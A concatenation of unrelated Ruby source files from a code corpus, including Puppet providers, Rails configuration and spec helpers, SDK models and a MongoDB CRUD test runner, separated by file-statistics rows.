Puppet.debug "dsc_ensure: #{resource[:dsc_ensure]}" if resource.parameters.key?(:dsc_ensure)
Puppet.debug "ensure: #{resource[:ensure]}"
exists
end
def create
script_content = ps_script_content('set')
Puppet.debug "\n" + self.class.redact_content(script_content)
if Pwsh::Manager.windows_powershell_supported?
output = ps_manager.execute(script_content, DSC_LITE_COMMAND_TIMEOUT)[:stdout]
else
self.class.upgrade_message
output = powershell(Pwsh::Manager.powershell_args, script_content)
end
Puppet.debug "Create Dsc Resource returned: #{output}"
data = JSON.parse(output)
raise(data['errormessage']) unless data['errormessage'].empty?
notify_reboot_pending if data['rebootrequired'] == true
data
end
def notify_reboot_pending
Puppet.info 'A reboot is required to progress further. Notifying Puppet.'
reboot_resource = resource.catalog.resource(:reboot, 'dsc_reboot')
unless reboot_resource
Puppet.warning "No reboot resource found in the graph that has 'dsc_reboot' as its name. Cannot signal reboot to Puppet."
return
end
if reboot_resource.provider.respond_to?(:reboot_required)
# internal API used to let reboot resource knows a reboot is pending
reboot_resource.provider.reboot_required = true
else
Puppet.warning 'Reboot module must be updated, since resource does not have :reboot_required method implemented. Cannot signal reboot to Puppet.'
return
end
end
def self.format_dsc_lite(dsc_value)
PuppetX::PuppetLabs::DscLite::PowerShellHashFormatter.format(dsc_value)
end
def self.escape_quotes(text)
text.gsub("'", "''")
end
def self.redact_content(content)
# Note that here we match after an equals to ensure we redact the value being passed, but not the key.
# This means a redaction of a string not including '= ' before the string value will not redact.
# Every secret unwrapped in this module will unwrap as "'secret' # PuppetSensitive" and, currently,
# always inside a hash table to be passed along. This means we can (currently) expect the value to
# always come after an equals sign.
# Note that the line may include a semi-colon and/or a newline character after the sensitive unwrap.
content.gsub(%r{= '.+' # PuppetSensitive;?(\\n)?$}, "= '[REDACTED]'")
end
def ps_script_content(mode)
self.class.ps_script_content(mode, resource, self)
end
def self.ps_script_content(mode, resource, provider)
dsc_invoke_method = mode
@param_hash = resource
template_name = resource.generic_dsc ? '/invoke_generic_dsc_resource.ps1.erb' : '/invoke_dsc_resource.ps1.erb'
file = File.new(template_path + template_name, encoding: Encoding::UTF_8)
template = ERB.new(file.read, nil, '-')
template.result(binding)
end
end
| 38.580645 | 151 | 0.714548 |
08a3d6179f7529c90df44cdcebafa7096ade53f2 | 1,078 | # This file is copied to spec/ when you run 'rails generate rspec:install'
ENV["RAILS_ENV"] ||= 'test'
require File.expand_path("../../config/environment", __FILE__)
require 'rspec/rails'
# Requires supporting ruby files with custom matchers and macros, etc,
# in spec/support/ and its subdirectories.
Dir[Rails.root.join("spec/support/**/*.rb")].each {|f| require f}
RSpec.configure do |config|
# == Mock Framework
#
# If you prefer to use mocha, flexmock or RR, uncomment the appropriate line:
#
# config.mock_with :mocha
# config.mock_with :flexmock
# config.mock_with :rr
config.mock_with :rspec
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
config.include ActionView::TestCase::Behavior, example_group: {file_path: %r{spec/presenters}}
end
| 35.933333 | 96 | 0.734694 |
390de5543004af96efde84a001e5251778ae742f | 2,136 | require 'singleton'
module JSRailsRoutes
class Generator
COMPARE_REGEXP = %r{:(.*?)(/|$)}
PROCESS_FUNC = <<-JAVASCRIPT.freeze
function process(route, params, keys) {
var query = [];
for (var param in params) if (params.hasOwnProperty(param)) {
if (keys.indexOf(param) === -1) {
query.push(param + "=" + encodeURIComponent(params[param]));
}
}
return query.length ? route + "?" + query.join("&") : route;
}
JAVASCRIPT
include Singleton
attr_accessor :include_paths, :exclude_paths, :include_names, :exclude_names, :path
def initialize
self.include_paths = /.*/
self.exclude_paths = /^$/
self.include_names = /.*/
self.exclude_names = /^$/
self.path = Rails.root.join('app', 'assets', 'javascripts', 'rails-routes.js')
Rails.application.reload_routes!
end
def generate(task)
lines = ["// Don't edit manually. `rake #{task}` generates this file.", PROCESS_FUNC]
lines += routes.map do |route_name, route_path|
handle_route(route_name, route_path) if match?(route_name, route_path)
end.compact
lines += [''] # End with new line
write(lines.join("\n"))
end
private
def match?(route_name, route_path)
return false if include_paths !~ route_path
return false if exclude_paths =~ route_path
return false if include_names !~ route_name
return false if exclude_names =~ route_name
true
end
def handle_route(route_name, route_path)
keys = []
while route_path =~ COMPARE_REGEXP
keys.push("'#{$1}'")
route_path.sub!(COMPARE_REGEXP, "' + params.#{$1} + '#{$2}")
end
"export function #{route_name}_path(params) { return process('#{route_path}', params, [#{keys.join(',')}]); }"
end
def routes
@routes ||= Rails.application.routes.routes
.select(&:name)
.map { |r| [r.name, r.path.spec.to_s.split('(')[0]] }
.sort { |a, b| a[0] <=> b[0] }
end
def write(string)
File.open(path, 'w') { |f| f.write(string) }
end
end
end
| 29.666667 | 116 | 0.594569 |
f8efcbd6a849ec3187f008a8923756354effaabf | 853 | Gem::Specification.new do |s|
s.name = 'jekyll-theme-merlot'
s.version = '0.1.1'
s.license = 'CC0-1.0'
s.authors = ['Cameron McEfee', 'GitHub, Inc.']
s.email = ['[email protected]']
s.homepage = 'https://github.com/stage/merlot'
s.summary = 'Merlot is a Jekyll theme for GitHub Pages'
s.files = `git ls-files -z`.split("\x0").select do |f|
f.match(%r{^((_includes|_layouts|_sass|assets)/|(LICENSE|README)((\.(txt|md|markdown)|$)))}i)
end
s.platform = Gem::Platform::RUBY
s.add_runtime_dependency 'jekyll', '> 3.5', '< 5.0'
s.add_runtime_dependency 'jekyll-seo-tag', '~> 2.0'
s.add_development_dependency 'html-proofer', '~> 3.0'
s.add_development_dependency 'rubocop', '~> 0.50'
s.add_development_dependency 'w3c_validators', '~> 1.3'
end
| 40.619048 | 97 | 0.622509 |
7a9d8a5c50338d3eeade5cc868e86e46dc365d83 | 48 | module OpenBadges
module TagsHelper
end
end
| 9.6 | 19 | 0.791667 |
e2e4793b42e7bd7753fdd979420a184eb25ca7dc | 1,536 | require 'puppet/util/agentil'
Puppet::Type.type(:agentil_landscape).provide(:agentil) do
def self.instances
instances = []
Puppet::Util::Agentil.parse unless Puppet::Util::Agentil.parsed?
Puppet::Util::Agentil.landscapes.each do |index, landscape|
instances << new(:name => landscape.name, :ensure => :present, :agentil_landscape => landscape)
end
instances
end
def self.prefetch(resources)
instances.each do |prov|
if resource = resources[prov.name]
resource.provider = prov
end
end
end
def exists?
get(:ensure) != :absent
end
def create
raise Puppet::Error, "Unable to create a new landscape with no sid beeing specified" unless resource[:sid]
new_landscape = Puppet::Util::Agentil.add_landscape
new_landscape.name = resource[:name]
new_landscape.sid = resource[:sid]
new_landscape.company = resource[:company] if resource[:company]
new_landscape.description = resource[:description] if resource[:description]
@property_hash[:agentil_landscape] = new_landscape
end
def destroy
Puppet::Util::Agentil.del_landscape @property_hash[:agentil_landscape].id
@property_hash.delete :agentil_landscape
end
[:sid, :description, :company].each do |prop|
define_method(prop) do
@property_hash[:agentil_landscape].send(prop)
end
define_method("#{prop}=") do |new_value|
@property_hash[:agentil_landscape].send("#{prop}=", new_value)
end
end
def flush
Puppet::Util::Agentil.sync
end
end
| 28.444444 | 110 | 0.69987 |
793854f26848d0fbb959969ff5bec80e610a3308 | 7,510 | # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# Details for updating the dedicated virtual machine host details.
#
class Core::Models::UpdateDedicatedVmHostDetails
# Defined tags for this resource. Each key is predefined and scoped to a
# namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
#
# Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
#
# @return [Hash<String, Hash<String, Object>>]
attr_accessor :defined_tags
# A user-friendly name. Does not have to be unique, and it's changeable.
# Avoid entering confidential information.
#
# Example: `My dedicated VM host`
#
# @return [String]
attr_accessor :display_name
# Free-form tags for this resource. Each tag is a simple key-value pair with no
# predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
#
# Example: `{\"Department\": \"Finance\"}`
#
# @return [Hash<String, String>]
attr_accessor :freeform_tags
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'defined_tags': :'definedTags',
'display_name': :'displayName',
'freeform_tags': :'freeformTags'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'defined_tags': :'Hash<String, Hash<String, Object>>',
'display_name': :'String',
'freeform_tags': :'Hash<String, String>'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [Hash<String, Hash<String, Object>>] :defined_tags The value to assign to the {#defined_tags} property
# @option attributes [String] :display_name The value to assign to the {#display_name} property
# @option attributes [Hash<String, String>] :freeform_tags The value to assign to the {#freeform_tags} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.defined_tags = attributes[:'definedTags'] if attributes[:'definedTags']
raise 'You cannot provide both :definedTags and :defined_tags' if attributes.key?(:'definedTags') && attributes.key?(:'defined_tags')
self.defined_tags = attributes[:'defined_tags'] if attributes[:'defined_tags']
self.display_name = attributes[:'displayName'] if attributes[:'displayName']
raise 'You cannot provide both :displayName and :display_name' if attributes.key?(:'displayName') && attributes.key?(:'display_name')
self.display_name = attributes[:'display_name'] if attributes[:'display_name']
self.freeform_tags = attributes[:'freeformTags'] if attributes[:'freeformTags']
raise 'You cannot provide both :freeformTags and :freeform_tags' if attributes.key?(:'freeformTags') && attributes.key?(:'freeform_tags')
self.freeform_tags = attributes[:'freeform_tags'] if attributes[:'freeform_tags']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
defined_tags == other.defined_tags &&
display_name == other.display_name &&
freeform_tags == other.freeform_tags
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[defined_tags, display_name, freeform_tags].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 38.316327 | 245 | 0.679095 |
5d064f5df070f703128893be29ea7e39e14606eb | 503 | WillPaginate.per_page = 10
class Question < ActiveRecord::Base
# This is Sinatra! Remember to create a migration!
self.per_page = 10
UP_VOTE = 'Upvote'
belongs_to :user
has_many :answers, :dependent => :destroy
has_many :votes, :foreign_key => "question_id", :class_name => "QuestionVote", :dependent => :destroy
validates :title, :presence => true, :length => {:maximum => 200}
scope :top, -> { joins(:votes).where('vote_type = ?', UP_VOTE).group(:id).order(id: :desc).count }
end
| 23.952381 | 102 | 0.67992 |
21eba7919d3efa7f04a80a2e73b70129cba31260 | 1,771 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports and disable caching.
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
config.serve_static_files = false
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.default_url_options = { :host => 'localhost' }
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
# config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Asset digests allow you to set far-future HTTP expiration dates on all assets,
# yet still be able to expire them through the digest params.
config.assets.digest = true
# Adds additional error checking when serving assets at runtime.
# Checks for improperly declared sprockets dependencies.
# Raises helpful error messages.
config.assets.raise_runtime_errors = true
Mongo::Logger.logger.level = ::Logger::FATAL
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
end
| 38.5 | 85 | 0.763411 |
392ddbdbc48156e56c1cc30dd5e2d8ca179b72f3 | 1,619 | module Cryptoexchange::Exchanges
module Btcsquare
module Services
class Market < Cryptoexchange::Services::Market
class << self
def supports_individual_ticker_query?
false
end
end
def fetch
output = super(ticker_url)
adapt_all(output)
end
def ticker_url
"#{Cryptoexchange::Exchanges::Btcsquare::Market::API_URL}/markets"
end
def adapt_all(output)
output.map do |pair|
target, base = pair.keys.first.split('-')
market_pair = Cryptoexchange::Models::MarketPair.new(
base: base,
target: target,
market: Btcsquare::Market::NAME
)
adapt(pair.values.first, market_pair)
end
end
def adapt(output, market_pair)
ticker = Cryptoexchange::Models::Ticker.new
ticker.base = market_pair.base
ticker.target = market_pair.target
ticker.market = Btcsquare::Market::NAME
ticker.ask = NumericHelper.to_d(output['ask'])
ticker.bid = NumericHelper.to_d(output['bid'])
ticker.high = NumericHelper.to_d(output['high'])
ticker.low = NumericHelper.to_d(output['low'])
ticker.last = NumericHelper.to_d(output['price'])
ticker.volume = NumericHelper.divide(NumericHelper.to_d(output['volume']), ticker.last)
ticker.timestamp = nil
ticker.payload = output
ticker
end
end
end
end
end
| 31.745098 | 100 | 0.560222 |
e241ef01b5d514b44dd5de6c21c2457633d1c685 | 2,464 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe GameToolsService, type: :http do
subject { described_class.new }
describe '#get_server' do
let(:server_name) { 'Battlefield da Depressao - LOCKER 24/7 50Hz - i3D.net' }
let(:endpoint) { 'https://api.gametools.network/bf4/servers/' }
let(:params) { { 'name' => server_name } }
context 'with success' do
it 'should return success monad response' do
servers = build(:game_tools_servers)
expect(Faraday)
.to receive(:get)
.with(endpoint, params)
.and_return(Faraday::Response.new(status: 200, body: servers.to_json))
result = subject.get_server('bf4', server_name)
expect(result).to be_success
end
end
context 'with failure' do
it 'should return the message error' do
error = {
'detail' => [
{
'loc' => %w(query name),
'msg' => 'field required',
'type' => 'value_error.missing'
}
]
}
expect(Faraday)
.to receive(:get)
.with(endpoint, params)
.and_return(Faraday::Response.new(status: 422, body: error.to_json))
result = subject.get_server('bf4', server_name)
expect(result).to be_failure
end
end
end
describe '#get_server_details' do
let(:server_name) { 'Battlefield da Depressao - LOCKER 24/7 50Hz - i3D.net' }
let(:endpoint) { 'https://api.gametools.network/bf4/detailedserver/' }
let(:params) { { 'name' => server_name } }
context 'with success' do
it 'should return success monad response' do
server_details = build(:game_tools_server_details)
expect(Faraday)
.to receive(:get)
.with(endpoint, params)
.and_return(Faraday::Response.new(status: 200, body: server_details.to_json))
result = subject.get_server_details('bf4', server_name)
expect(result).to be_success
end
end
context 'with failure' do
it 'should return the message error' do
error = { 'errors' => ['error getting server info'] }
expect(Faraday)
.to receive(:get)
.with(endpoint, params)
.and_return(Faraday::Response.new(status: 422, body: error.to_json))
result = subject.get_server_details('bf4', server_name)
expect(result).to be_failure
end
end
end
end
| 28 | 87 | 0.601055 |
f76cc0ed3e135b57240e3d1b026bb9e62ad521af | 1,696 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_08_01
module Models
#
# List of virtual network gateway vpn client connection health.
#
class VpnClientConnectionHealthDetailListResult
include MsRestAzure
# @return [Array<VpnClientConnectionHealthDetail>] List of vpn client
# connection health.
attr_accessor :value
#
# Mapper for VpnClientConnectionHealthDetailListResult class as Ruby
# Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'VpnClientConnectionHealthDetailListResult',
type: {
name: 'Composite',
class_name: 'VpnClientConnectionHealthDetailListResult',
model_properties: {
value: {
client_side_validation: true,
required: false,
serialized_name: 'value',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'VpnClientConnectionHealthDetailElementType',
type: {
name: 'Composite',
class_name: 'VpnClientConnectionHealthDetail'
}
}
}
}
}
}
}
end
end
end
end
| 29.241379 | 84 | 0.549528 |
1a3164379e6520b24de396d8e96004f42dacbed1 | 152 | class CreateProjects < ActiveRecord::Migration
def change
create_table :projects do |t|
t.string :name
t.timestamps
end
end
end
| 16.888889 | 46 | 0.677632 |
039a0c6383ef29100176f30c9ddfb18bad4950c2 | 1,055 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require 'spec_helper'
describe Elasticsearch::DSL::Search::Aggregations::ReverseNested do
let(:search) do
described_class.new
end
describe '#to_hash' do
it 'can be converted to a hash' do
expect(search.to_hash).to eq(reverse_nested: {})
end
end
end
| 31.969697 | 67 | 0.754502 |
7a99bb2d0dcc6e59c66165ec4128f74de77d9afc | 7,449 | # frozen_string_literal: true
# encoding: utf-8
module Unified
module CrudOperations
def find(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
opts = {
let: args.use('let'),
}
if session = args.use('session')
opts[:session] = entities.get(:session, session)
end
req = collection.find(args.use!('filter'), **opts)
if batch_size = args.use('batchSize')
req = req.batch_size(batch_size)
end
if sort = args.use('sort')
req = req.sort(sort)
end
if limit = args.use('limit')
req = req.limit(limit)
end
result = req.to_a
end
end
def count_documents(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
opts = {}
if session = args.use('session')
opts[:session] = entities.get(:session, session)
end
collection.find(args.use!('filter')).count_documents(**opts)
end
end
def estimated_document_count(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
opts = {}
if max_time_ms = args.use('maxTimeMS')
opts[:max_time_ms] = max_time_ms
end
collection.estimated_document_count(**opts)
end
end
def distinct(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
opts = {}
if session = args.use('session')
opts[:session] = entities.get(:session, session)
end
req = collection.find(args.use!('filter'), **opts).distinct(args.use!('fieldName'), **opts)
result = req.to_a
end
end
def find_one_and_update(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
filter = args.use!('filter')
update = args.use!('update')
opts = {
let: args.use('let'),
}
if return_document = args.use('returnDocument')
opts[:return_document] = return_document.downcase.to_sym
end
if session = args.use('session')
opts[:session] = entities.get(:session, session)
end
collection.find_one_and_update(filter, update, **opts)
end
end
def find_one_and_replace(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
filter = args.use!('filter')
update = args.use!('replacement')
opts = {
let: args.use('let'),
}
if session = args.use('session')
opts[:session] = entities.get(:session, session)
end
collection.find_one_and_replace(filter, update, **opts)
end
end
def find_one_and_delete(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
filter = args.use!('filter')
opts = {
let: args.use('let'),
}
if session = args.use('session')
opts[:session] = entities.get(:session, session)
end
collection.find_one_and_delete(filter, **opts)
end
end
def insert_one(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
opts = {}
if session = args.use('session')
opts[:session] = entities.get(:session, session)
end
collection.insert_one(args.use!('document'), **opts)
end
end
def insert_many(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
opts = {}
unless (ordered = args.use('ordered')).nil?
opts[:ordered] = ordered
end
if session = args.use('session')
opts[:session] = entities.get(:session, session)
end
collection.insert_many(args.use!('documents'), **opts)
end
end
def update_one(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
opts = {
let: args.use('let'),
}
if session = args.use('session')
opts[:session] = entities.get(:session, session)
end
collection.update_one(args.use!('filter'), args.use!('update'), **opts)
end
end
def update_many(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
opts = {
let: args.use('let'),
}
collection.update_many(args.use!('filter'), args.use!('update'), **opts)
end
end
def replace_one(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
collection.replace_one(
args.use!('filter'),
args.use!('replacement'),
upsert: args.use('upsert'),
)
end
end
def delete_one(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
opts = {
let: args.use('let'),
}
if session = args.use('session')
opts[:session] = entities.get(:session, session)
end
collection.delete_one(args.use!('filter'), **opts)
end
end
def delete_many(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
opts = {
let: args.use('let'),
}
collection.delete_many(args.use!('filter'), **opts)
end
end
def bulk_write(op)
collection = entities.get(:collection, op.use!('object'))
use_arguments(op) do |args|
requests = args.use!('requests').map do |req|
convert_bulk_write_spec(req)
end
opts = {}
if ordered = args.use('ordered')
opts[:ordered] = true
end
collection.bulk_write(requests, **opts)
end
end
def aggregate(op)
obj = entities.get_any(op.use!('object'))
args = op.use!('arguments')
pipeline = args.use!('pipeline')
opts = {
let: args.use('let'),
}
if session = args.use('session')
opts[:session] = entities.get(:session, session)
end
unless args.empty?
raise NotImplementedError, "Unhandled spec keys: #{args} in #{test_spec}"
end
obj.aggregate(pipeline, **opts).to_a
end
private
def convert_bulk_write_spec(spec)
unless spec.keys.length == 1
raise NotImplementedError, "Must have exactly one item"
end
op, spec = spec.first
spec = UsingHash[spec]
out = case op
when 'insertOne'
spec.use!('document')
when 'updateOne', 'updateMany'
{
filter: spec.use('filter'),
update: spec.use('update'),
upsert: spec.use('upsert'),
}
when 'replaceOne'
{
filter: spec.use('filter'),
replacement: spec.use('replacement'),
upsert: spec.use('upsert'),
}
when 'deleteOne', 'deleteMany'
{
filter: spec.use('filter'),
}
else
raise NotImplementedError, "Unknown operation #{op}"
end
unless spec.empty?
raise NotImplementedError, "Unhandled keys: #{spec}"
end
{Utils.underscore(op) =>out}
end
end
end
| 28.54023 | 99 | 0.558464 |
381f8d3717b28d0de4648f73f4a7df262c26fa41 | 1,298 | # Encoding: utf-8
#
# This is auto-generated code, changes will be overwritten.
#
# Copyright:: Copyright 2013, Google Inc. All Rights Reserved.
# License:: Licensed under the Apache License, Version 2.0.
#
# Code generated by AdsCommon library 0.9.6 on 2014-08-12 14:23:05.
require 'ads_common/savon_service'
require 'dfp_api/v201405/proposal_service_registry'
module DfpApi; module V201405; module ProposalService
class ProposalService < AdsCommon::SavonService
def initialize(config, endpoint)
namespace = 'https://www.google.com/apis/ads/publisher/v201405'
super(config, endpoint, namespace, :v201405)
end
def create_proposals(*args, &block)
return execute_action('create_proposals', args, &block)
end
def get_proposals_by_statement(*args, &block)
return execute_action('get_proposals_by_statement', args, &block)
end
def perform_proposal_action(*args, &block)
return execute_action('perform_proposal_action', args, &block)
end
def update_proposals(*args, &block)
return execute_action('update_proposals', args, &block)
end
private
def get_service_registry()
return ProposalServiceRegistry
end
def get_module()
return DfpApi::V201405::ProposalService
end
end
end; end; end
| 27.617021 | 71 | 0.724961 |
ed7d04bf4a801559e8012f17709dc9f4b7a8d523 | 8,884 | =begin
#BillForward REST API
#No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
require 'date'
module BillForward
class DunningLinePagedMetadata
# {\"description\":\"Paging parameter. URL fragment that can be used to fetch next page of results.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
attr_accessor :next_page
# {\"description\":\"Paging parameter. 0-indexed. Describes which page (given a page size of `recordsRequested`) of the result set you are viewing.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
attr_accessor :current_page
# {\"description\":\"Paging parameter. 0-indexed. Describes your current location within a pageable list of query results.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
attr_accessor :current_offset
# {\"default\":10,\"description\":\"Paging parameter. Describes how many records you requested.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
attr_accessor :records_requested
# {\"description\":\"Describes how many records were returned by your query.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
attr_accessor :records_returned
# {\"description\":\"Number of milliseconds taken by API to calculate response.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
attr_accessor :execution_time
# {\"description\":\"The results returned by your query.\",\"verbs\":[\"GET\",\"PUT\",\"POST\"]}
attr_accessor :results
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'next_page' => :'nextPage',
:'current_page' => :'currentPage',
:'current_offset' => :'currentOffset',
:'records_requested' => :'recordsRequested',
:'records_returned' => :'recordsReturned',
:'execution_time' => :'executionTime',
:'results' => :'results'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'next_page' => :'String',
:'current_page' => :'Integer',
:'current_offset' => :'Integer',
:'records_requested' => :'Integer',
:'records_returned' => :'Integer',
:'execution_time' => :'Integer',
:'results' => :'Array<DunningLine>'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}
if attributes.has_key?(:'nextPage')
self.next_page = attributes[:'nextPage']
end
if attributes.has_key?(:'currentPage')
self.current_page = attributes[:'currentPage']
end
if attributes.has_key?(:'currentOffset')
self.current_offset = attributes[:'currentOffset']
end
if attributes.has_key?(:'recordsRequested')
self.records_requested = attributes[:'recordsRequested']
end
if attributes.has_key?(:'recordsReturned')
self.records_returned = attributes[:'recordsReturned']
end
if attributes.has_key?(:'executionTime')
self.execution_time = attributes[:'executionTime']
end
if attributes.has_key?(:'results')
if (value = attributes[:'results']).is_a?(Array)
self.results = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properies with the reasons
def list_invalid_properties
invalid_properties = Array.new
return invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @next_page.nil?
return false if @current_page.nil?
return false if @current_offset.nil?
return false if @records_requested.nil?
return false if @records_returned.nil?
return false if @execution_time.nil?
return false if @results.nil?
return true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
next_page == o.next_page &&
current_page == o.current_page &&
current_offset == o.current_offset &&
records_requested == o.records_requested &&
records_returned == o.records_returned &&
execution_time == o.execution_time &&
results == o.results
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[next_page, current_page, current_offset, records_requested, records_returned, execution_time, results].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
